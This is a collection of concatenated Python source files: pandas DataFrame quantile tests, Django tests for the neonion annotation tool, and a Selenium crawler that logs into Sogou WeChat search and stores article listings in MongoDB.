tm.assert_series_equal(result, expected)
def test_quantile_axis_mixed(self):
# mixed on axis=1
df = DataFrame(
{
"A": [1, 2, 3],
"B": [2.0, 3.0, 4.0],
"C": pd.date_range("20130101", periods=3),
"D": ["foo", "bar", "baz"],
}
)
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], name=0.5)
tm.assert_series_equal(result, expected)
# must raise
msg = "'<' not supported between instances of 'Timestamp' and 'float'"
with pytest.raises(TypeError, match=msg):
df.quantile(0.5, axis=1, numeric_only=False)
def test_quantile_axis_parameter(self):
# GH 9543/9544
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=0)
expected = Series([2.0, 3.0], index=["A", "B"], name=0.5)
tm.assert_series_equal(result, expected)
expected = df.quantile(0.5, axis="index")
tm.assert_series_equal(result, expected)
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
result = df.quantile(0.5, axis="columns")
tm.assert_series_equal(result, expected)
msg = "No axis named -1 for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.quantile(0.1, axis=-1)
msg = "No axis named column for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.quantile(0.1, axis="column")
def test_quantile_interpolation(self):
# see gh-10174
# interpolation method other than default linear
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1, interpolation="nearest")
expected = Series([1, 2, 3], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
# cross-check interpolation=nearest results in original dtype
exp = np.percentile(
np.array([[1, 2, 3], [2, 3, 4]]), 0.5, axis=0, interpolation="nearest"
)
expected = Series(exp, index=[1, 2, 3], name=0.5, dtype="int64")
tm.assert_series_equal(result, expected)
# float
df = DataFrame({"A": [1.0, 2.0, 3.0], "B": [2.0, 3.0, 4.0]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1, interpolation="nearest")
expected = Series([1.0, 2.0, 3.0], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
exp = np.percentile(
np.array([[1.0, 2.0, 3.0], [2.0, 3.0, 4.0]]),
0.5,
axis=0,
interpolation="nearest",
)
expected = Series(exp, index=[1, 2, 3], name=0.5, dtype="float64")
tm.assert_series_equal(result, expected)
# axis
result = df.quantile([0.5, 0.75], axis=1, interpolation="lower")
expected = DataFrame(
{1: [1.0, 1.0], 2: [2.0, 2.0], 3: [3.0, 3.0]}, index=[0.5, 0.75]
)
tm.assert_frame_equal(result, expected)
# test degenerate case
df = DataFrame({"x": [], "y": []})
q = df.quantile(0.1, axis=0, interpolation="higher")
assert np.isnan(q["x"]) and np.isnan(q["y"])
# multi
df = DataFrame([[1, 1, 1], [2, 2, 2], [3, 3, 3]], columns=["a", "b", "c"])
result = df.quantile([0.25, 0.5], interpolation="midpoint")
# https://github.com/numpy/numpy/issues/7163
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]],
index=[0.25, 0.5],
columns=["a", "b", "c"],
)
tm.assert_frame_equal(result, expected)
def test_quantile_interpolation_datetime(self, datetime_frame):
# see gh-10174
# interpolation = linear (default case)
df = datetime_frame
q = df.quantile(0.1, axis=0, interpolation="linear")
assert q["A"] == np.percentile(df["A"], 10)
def test_quantile_interpolation_int(self, int_frame):
# see gh-10174
df = int_frame
# interpolation = linear (default case)
q = df.quantile(0.1)
assert q["A"] == np.percentile(df["A"], 10)
# test with and without interpolation keyword
q1 = df.quantile(0.1, axis=0, interpolation="linear")
assert q1["A"] == np.percentile(df["A"], 10)
tm.assert_series_equal(q, q1)
def test_quantile_multi(self):
df = DataFrame([[1, 1, 1], [2, 2, 2], [3, 3, 3]], columns=["a", "b", "c"])
result = df.quantile([0.25, 0.5])
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]],
index=[0.25, 0.5],
columns=["a", "b", "c"],
)
tm.assert_frame_equal(result, expected)
# axis = 1
result = df.quantile([0.25, 0.5], axis=1)
expected = DataFrame(
[[1.5, 1.5, 1.5], [2.0, 2.0, 2.0]], index=[0.25, 0.5], columns=[0, 1, 2]
)
# empty
result = DataFrame({"x": [], "y": []}).quantile([0.1, 0.9], axis=0)
expected = DataFrame(
{"x": [np.nan, np.nan], "y": [np.nan, np.nan]}, index=[0.1, 0.9]
)
tm.assert_frame_equal(result, expected)
def test_quantile_datetime(self):
df = DataFrame({"a": pd.to_datetime(["2010", "2011"]), "b": [0, 5]})
# exclude datetime
result = df.quantile(0.5)
expected = Series([2.5], index=["b"])
# datetime
result = df.quantile(0.5, numeric_only=False)
expected = Series(
[Timestamp("2010-07-02 12:00:00"), 2.5], index=["a", "b"], name=0.5
)
tm.assert_series_equal(result, expected)
# datetime w/ multi
result = df.quantile([0.5], numeric_only=False)
expected = DataFrame(
[[Timestamp("2010-07-02 12:00:00"), 2.5]], index=[0.5], columns=["a", "b"]
)
tm.assert_frame_equal(result, expected)
# axis = 1
df["c"] = pd.to_datetime(["2011", "2012"])
result = df[["a", "c"]].quantile(0.5, axis=1, numeric_only=False)
expected = Series(
[Timestamp("2010-07-02 12:00:00"), Timestamp("2011-07-02 12:00:00")],
index=[0, 1],
name=0.5,
)
tm.assert_series_equal(result, expected)
result = df[["a", "c"]].quantile([0.5], axis=1, numeric_only=False)
expected = DataFrame(
[[Timestamp("2010-07-02 12:00:00"), Timestamp("2011-07-02 12:00:00")]],
index=[0.5],
columns=[0, 1],
)
tm.assert_frame_equal(result, expected)
# empty when numeric_only=True
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# result = df[['a', 'c']].quantile(.5)
# result = df[['a', 'c']].quantile([.5])
def test_quantile_invalid(self, datetime_frame):
msg = "percentiles should all be in the interval \\[0, 1\\]"
for invalid in [-1, 2, [0.5, -1], [0.5, 2]]:
with pytest.raises(ValueError, match=msg):
datetime_frame.quantile(invalid)
def test_quantile_box(self):
df = DataFrame(
{
"A": [
Timestamp("2011-01-01"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
],
"B": [
Timestamp("2011-01-01", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-03", tz="US/Eastern"),
],
"C": [
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
],
}
)
res = df.quantile(0.5, numeric_only=False)
exp = Series(
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
],
name=0.5,
index=["A", "B", "C"],
)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
]
],
index=[0.5],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(res, exp)
# DatetimeBlock may be consolidated and contain NaT in different loc
df = DataFrame(
{
"A": [
Timestamp("2011-01-01"),
pd.NaT,
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
],
"a": [
Timestamp("2011-01-01"),
Timestamp("2011-01-02"),
pd.NaT,
Timestamp("2011-01-03"),
],
"B": [
Timestamp("2011-01-01", tz="US/Eastern"),
pd.NaT,
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-03", tz="US/Eastern"),
],
"b": [
Timestamp("2011-01-01", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.NaT,
Timestamp("2011-01-03", tz="US/Eastern"),
],
"C": [
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
pd.NaT,
],
"c": [
pd.NaT,
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
],
},
columns=list("AaBbCc"),
)
res = df.quantile(0.5, numeric_only=False)
exp = Series(
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
pd.Timedelta("2 days"),
],
name=0.5,
index=list("AaBbCc"),
)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[
[
Timestamp("2011-01-02"),
Timestamp("2011-01-02"),
Timestamp("2011-01-02", tz="US/Eastern"),
Timestamp("2011-01-02", tz="US/Eastern"),
pd.Timedelta("2 days"),
pd.Timedelta("2 days"),
]
],
index=[0.5],
columns=list("AaBbCc"),
)
tm.assert_frame_equal(res, exp)
def test_quantile_nan(self):
# GH 14357 - float block where some cols have missing values
df = DataFrame({"a": np.arange(1, 6.0), "b": np.arange(1, 6.0)})
df.iloc[-1, 1] = np.nan
res = df.quantile(0.5)
exp = Series([3.0, 2.5], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75])
exp = DataFrame({"a": [3.0, 4.0], "b": [2.5, 3.25]}, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
res = df.quantile(0.5, axis=1)
exp = Series(np.arange(1.0, 6.0), name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75], axis=1)
exp = DataFrame([np.arange(1.0, 6.0)] * 2, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
# full-nan column
df["b"] = np.nan
res = df.quantile(0.5)
exp = Series([3.0, np.nan], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5, 0.75])
exp = DataFrame({"a": [3.0, 4.0], "b": [np.nan, np.nan]}, index=[0.5, 0.75])
tm.assert_frame_equal(res, exp)
def test_quantile_nat(self):
# full NaT column
df = DataFrame({"a": [pd.NaT, pd.NaT, pd.NaT]})
res = df.quantile(0.5, numeric_only=False)
exp = Series([pd.NaT], index=["a"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame({"a": [pd.NaT]}, index=[0.5])
tm.assert_frame_equal(res, exp)
# mixed non-null / full null column
df = DataFrame(
{
"a": [
Timestamp("2012-01-01"),
Timestamp("2012-01-02"),
Timestamp("2012-01-03"),
],
"b": [pd.NaT, pd.NaT, pd.NaT],
}
)
res = df.quantile(0.5, numeric_only=False)
exp = Series([Timestamp("2012-01-02"), pd.NaT], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5], numeric_only=False)
exp = DataFrame(
[[Timestamp("2012-01-02"), pd.NaT]], index=[0.5], columns=["a", "b"]
)
tm.assert_frame_equal(res, exp)
def test_quantile_empty_no_rows(self):
# floats
df = DataFrame(columns=["a", "b"], dtype="float64")
res = df.quantile(0.5)
exp = Series([np.nan, np.nan], index=["a", "b"], name=0.5)
tm.assert_series_equal(res, exp)
res = df.quantile([0.5])
exp = DataFrame([[np.nan, np.nan]], columns=["a", "b"], index=[0.5])
tm.assert_frame_equal(res, exp)
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# res = df.quantile(0.5, axis=1)
# res = df.quantile([0.5], axis=1)
# ints
df = DataFrame(columns=["a", "b"], dtype="int64")
# FIXME (gives empty frame in 0.18.1, broken in 0.19.0)
# res = df.quantile(0.5)
# datetimes
df = DataFrame(columns=["a", "b"], dtype="datetime64[ns]")
# FIXME (gives NaNs instead of NaT in 0.18.1 or 0.19.0)
# res = df.quantile(0.5, numeric_only=False)
def test_quantile_empty_no_columns(self):
# GH#23925 _get_numeric_data may drop all columns
df = DataFrame(pd.date_range("1/1/18", periods=5))
df.columns.name = "captain tightpants"
result = df.quantile(0.5)
expected = Series([], index=[], name=0.5, dtype=np.float64)
expected.index.name = "captain tightpants"
tm.assert_series_equal(result, expected)
result = df.quantile([0.5])
expected = DataFrame([], index=[0.5], columns=[])
expected.columns.name = "captain tightpants"
tm.assert_frame_equal(result, expected)
def test_quantile_item_cache(self):
        # previous behavior incorrectly retained an invalid _item_cache entry
df = DataFrame(np.random.randn(4, 3), columns=["A", "B", "C"])
df["D"] = df["A"] * 2
ser = df["A"]
assert len(df._mgr.blocks) == 2
df.quantile(numeric_only=False)
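        # after quantile, writes through the cached Series must still be visible in the
        # DataFrame, i.e. no stale _item_cache entry may survive the call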
ser.values[0] = 99
assert df.iloc[0, 0] == df["A"][0]
| bsd-3-clause | -840,498,865,969,401,900 | 33.39548 | 86 | 0.481001 | false |
Taraka16/neonion | common/tests.py | 1 | 10396 | from django.test import TestCase
from uri import generate_uri
from statements import Annotation
from annotation import add_resource_uri, SemanticAnnotationValidator, pre_process_annotation
from exceptions import InvalidAnnotationError, InvalidResourceTypeError
from vocab import neonion, OpenAnnotation
from cms import ContentSystem
from django.core.validators import URLValidator
from documents.tests import create_test_document
from common.statements import metadata_statement
class AnnotationValidationTestCase(TestCase):
def setUp(self):
self.valid = {
'highlight': {
'oa': {'motivatedBy': OpenAnnotation.Motivations.highlighting.value}
},
'comment': {
'text': 'Comment text',
'oa': {
'motivatedBy': OpenAnnotation.Motivations.commenting.value,
'hasBody': {'type': OpenAnnotation.DocumentTypes.text.value}
},
},
'classification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'identification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.identifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'uri': 'http://neonion.org/instance1',
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'linking': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.linking.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
'hasTarget': {}
},
}
}
self.invalid = {
'noMotivation': {
'oa': {}
},
'commentWithoutBody': {
'oa': {'motivatedBy': OpenAnnotation.Motivations.commenting.value}
},
'commentWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.commenting.value,
'hasBody': {'type': 'someType'}
}
},
'classificationWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': 'someType'},
}
},
'classificationWithoutConceptType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
}
},
'linkingWithInvalidBodyType': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.linking.value,
'hasBody': {'type': 'someType'},
'hasTarget': {}
}
}
}
def test_valid_annotations(self):
validate = SemanticAnnotationValidator()
self.assertIsNone(validate(self.valid['comment']))
self.assertIsNone(validate(self.valid['highlight']))
self.assertIsNone(validate(self.valid['classification']))
self.assertIsNone(validate(self.valid['identification']))
self.assertIsNone(validate(self.valid['linking']))
def test_invalid_annotations(self):
validate = SemanticAnnotationValidator()
self.assertRaises(InvalidAnnotationError, validate, self.invalid['noMotivation'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['commentWithoutBody'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['commentWithInvalidBodyType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['classificationWithInvalidBodyType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['classificationWithoutConceptType'])
self.assertRaises(InvalidAnnotationError, validate, self.invalid['linkingWithInvalidBodyType'])
class AnnotationPreProcessTestCase(TestCase):
def setUp(self):
self.pre_process = {
'classification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.classifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
},
'identification': {
'oa': {
'motivatedBy': OpenAnnotation.Motivations.identifying.value,
'hasBody': {'type': OpenAnnotation.TagTypes.semanticTag.value},
},
'rdf': {
'typeof': 'http://neonion.org/concept1',
'label': 'Name of the instance'
}
}
}
def test_pre_process(self):
        # the following two calls ensure that a URI is added during pre-processing
# (1) annotation is motivated by classification
annotation = pre_process_annotation(self.pre_process['classification'])
self.assertTrue('uri' in annotation['rdf'])
        # (2) annotation is motivated by identification
annotation = pre_process_annotation(self.pre_process['identification'])
self.assertTrue('uri' in annotation['rdf'])
class UriTestCase(TestCase):
def setUp(self):
self.resourceType = "http://neonion.org/concept/person"
self.invalidResourceType = "person"
def test_equal_uri_mapping(self):
uri1 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
uri2 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
self.assertEqual(uri1, uri2)
def test_not_equal_uri_mapping(self):
uri1 = generate_uri(resource_type=self.resourceType, name="Otto Hahn")
uri2 = generate_uri(resource_type=self.resourceType, name="Max Planck")
self.assertNotEqual(uri1, uri2)
def test_random_uri_mapping(self):
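        # with no name supplied, generate_uri is expected to fall back to a random, unique URI on every call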
uri1 = generate_uri(resource_type=self.resourceType)
uri2 = generate_uri(resource_type=self.resourceType)
self.assertNotEqual(uri1, uri2)
def test_invalid_uri_mapping(self):
self.assertRaises(InvalidResourceTypeError, generate_uri, resource_type=self.invalidResourceType)
class StatementsTestCase(TestCase):
def setUp(self):
self.noConceptAnnotation = {
"quote": "Otto Hahn"
}
self.conceptAnnotationWithoutURI = {
"quote": "Otto Hahn",
"oa": {
"hasBody": {
"type": "oa:SemanticTag"
}
},
"rdf": {
"label": "Name of resource",
"typeof": "http://neonion.org/concept/person"
}
}
self.conceptAnnotation = {
"quote": "Otto Hahn",
"oa": {
"hasBody": {
"type": "oa:SemanticTag"
}
},
"rdf": {
"label": "Name of resource",
"uri": "http://neonion.org/person/123456",
"typeof": "http://neonion.org/concept/person"
}
}
self.conceptAnnotationWithSameAs = {
"quote": "Otto Hahn",
"oa": {},
"rdf": {
"label": "Name of resource",
"uri": 'http://neonion.org/person/123456',
"typeof": "http://neonion.org/concept/person",
"sameAs": "http://de.dbpedia.org/page/Otto_Hahn"
}
}
self.test_general_document = create_test_document()
def test_no_semantic_annotation(self):
self.assertRaises(InvalidAnnotationError, Annotation.statement_about_resource, self.noConceptAnnotation)
def test_semantic_annotation(self):
statement = Annotation.statement_about_resource(self.conceptAnnotation)
self.assertTrue("rdf:type" in statement)
self.assertTrue("rdfs:label" in statement)
def test_semantic_annotation_with_same_as(self):
statement = Annotation.statement_about_resource(self.conceptAnnotationWithSameAs)
self.assertTrue("owl:sameAs" in statement)
def test_add_uri_to_invalid_annotation(self):
self.assertRaises(InvalidAnnotationError, add_resource_uri, self.noConceptAnnotation)
def test_add_uri_to_valid_annotation(self):
annotation = self.conceptAnnotationWithoutURI
self.assertFalse("uri" in annotation['rdf'])
annotation = add_resource_uri(self.conceptAnnotationWithoutURI)
self.assertTrue("uri" in annotation['rdf'])
def test_general_document(self):
statement = metadata_statement(self.test_general_document)
self.assertTrue("dc:title" in statement)
self.assertTrue("dc:creator" in statement)
self.assertTrue("dc:type" in statement)
class VocabTestCase(TestCase):
def test_valid_urls(self):
""" Tests whether the vocab contains only valid URLs. """
vocab = neonion()
vocab_uri = [
vocab.CONCEPT_SET, vocab.CONCEPT, vocab.LINKED_CONCEPT,
vocab.PROPERTY, vocab.LINKED_PROPERTY,
vocab.DOCUMENT, vocab.ANNOTATION_STORE_GRAPH
]
validate = URLValidator()
for uri in vocab_uri:
self.assertIsNone(validate(uri))
class ContentSystemTestCase(TestCase):
def test_abstract_cms(self):
cms = ContentSystem()
# expect NotImplementedError on all calls
self.assertRaises(NotImplementedError, cms.list)
self.assertRaises(NotImplementedError, cms.get_document, None)
self.assertRaises(NotImplementedError, cms.get_meta, None)
self.assertRaises(NotImplementedError, cms.search, None)
| gpl-2.0 | 4,945,973,575,964,803,000 | 37.361624 | 112 | 0.574933 | false |
jakobzhao/ashcrawler | core/wechat.py | 1 | 5809 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on April 12, 2016
# @author: Bo Zhao
# @email: [email protected]
# @website: http://yenching.org
# @organization: Harvard Kennedy School
import time
import platform
from pymongo import MongoClient, errors
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException
from bs4 import BeautifulSoup
from log import *
from settings import TIMEOUT, TZCHINA, WC_NAME, WC_PSW
import datetime
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Crawling pages from weixin.sogou.com
def wccrawler(keyword, project, address, port, username, password):
start = datetime.datetime.now()
log(NOTICE, 'Crawling WeChat with keyword %s....' % keyword)
if "Linux" in platform.platform():
browser = webdriver.PhantomJS(executable_path=r'/home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs')
else:
browser = webdriver.PhantomJS(executable_path=r'C:\Workspace\phantomjs\bin\phantomjs.exe')
# firefox_profile = webdriver.FirefoxProfile()
# firefox_profile.set_preference('permissions.default.image', 2)
# firefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')
# browser = webdriver.Firefox(firefox_profile=firefox_profile)
browser.set_window_size(960, 1050)
browser.set_window_position(0, 0)
browser.set_page_load_timeout(TIMEOUT)
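    # open the MongoDB connection for this project and authenticate before any pages are stored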
client = MongoClient(address, port)
db = client[project]
db.authenticate(username, password)
base_url = "http://weixin.sogou.com/"
while True:
try:
browser.get(base_url)
break
except TimeoutException:
# print 'time out after %d seconds when loading page' % TIMEOUT
# browser.execute_script('window.stop()')
log(NOTICE, "refreshing...")
WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, 'loginBtn')))
browser.find_element_by_id('loginBtn').click()
time.sleep(2)
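    # the QQ login form is embedded in nested iframes (ptlogin), so switch frames before filling in the credentials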
browser.switch_to.frame(0)
# browser.switch_to.frame(browser.find_element_by_id("ptlogin_iframe"))
time.sleep(2)
browser.switch_to.frame(0)
time.sleep(2)
browser.find_element_by_id('switcher_plogin').click()
# input username
user = WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, 'u')))
user.clear()
user.send_keys(WC_NAME, Keys.ARROW_DOWN)
    # input the password
passwd = browser.find_element_by_id('p')
passwd.clear()
passwd.send_keys(WC_PSW, Keys.ARROW_DOWN)
    # click the login button; a verification code (vcode) may appear afterwards
browser.find_element_by_class_name('login_button').click()
try:
time.sleep(3)
browser.find_element_by_class_name('login_button').click()
except:
pass
time.sleep(5)
browser.switch_to.default_content()
time.sleep(5)
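    # probe for the "indx-login" element to check whether the sign-in actually succeeded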
try:
browser.find_element_by_id("indx-login")
except:
log(NOTICE, "unlogin")
log(NOTICE, "login")
log(NOTICE, 'Harvesting the new pages generated within the past 24 hours.')
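    # type the keyword into the search box and submit the query; retry the whole step if the page times out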
while True:
try:
query = browser.find_element_by_id("upquery")
query.clear()
query.send_keys(keyword.decode('utf8'), Keys.ARROW_DOWN)
browser.find_element_by_class_name('swz').click()
time.sleep(5)
break
except TimeoutException:
browser.refresh()
log(NOTICE, 'refreshing')
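    # narrow the results to articles published within the last day (全部时间 -> 一天内)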
browser.find_element_by_link_text(u'全部时间').click()
time.sleep(2)
browser.find_element_by_link_text(u'一天内').click()
time.sleep(5)
soup = BeautifulSoup(browser.page_source, 'html5lib')
i = 0
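    # walk through the paginated result list and store every article entry until no next-page link is left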
while soup.find(id='sogou_next') is not None:
soup = BeautifulSoup(browser.page_source, 'html5lib')
t_china = datetime.datetime.now(TZCHINA)
for item in soup.find_all("div", "txt-box"):
try:
title = item.find('h4').text
                url = u'http://weixin.sogou.com' + item.h4.a.attrs['href']
abstract = item.p.text
user_name = item.find("a", "wx-name").attrs['title']
time_before = item.find("span", "time").text.split(")")[1]
except AttributeError:
log(WARNING, 'find an unusual page.')
continue
page_json = {
"type": "wechat",
"keyword": keyword,
"title": title.strip(),
"username": user_name,
"abstract": abstract.strip(),
"orig_url": url,
"url": url,
"created_at": t_china,
"time_before": time_before,
"page": i + 1
}
try:
db.pages.insert_one(page_json)
except errors.DuplicateKeyError:
log(NOTICE, 'This post has already been inserted.')
except:
pass
i += 1
print "page" + str(i) + " is processed: " + browser.current_url
# WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.LINK_TEXT, u'下一页')))
try:
browser.find_element_by_link_text(u'下一页').click()
time.sleep(10)
except NoSuchElementException:
log(NOTICE, "Reaching the last page.")
break
browser.close()
    log(NOTICE, 'Finished processing the keyword "%s". Time: %d sec(s)' % (keyword.decode('utf-8'), int((datetime.datetime.now() - start).seconds)))
| lgpl-3.0 | 1,400,240,208,662,310,000 | 34.048485 | 157 | 0.616635 | false |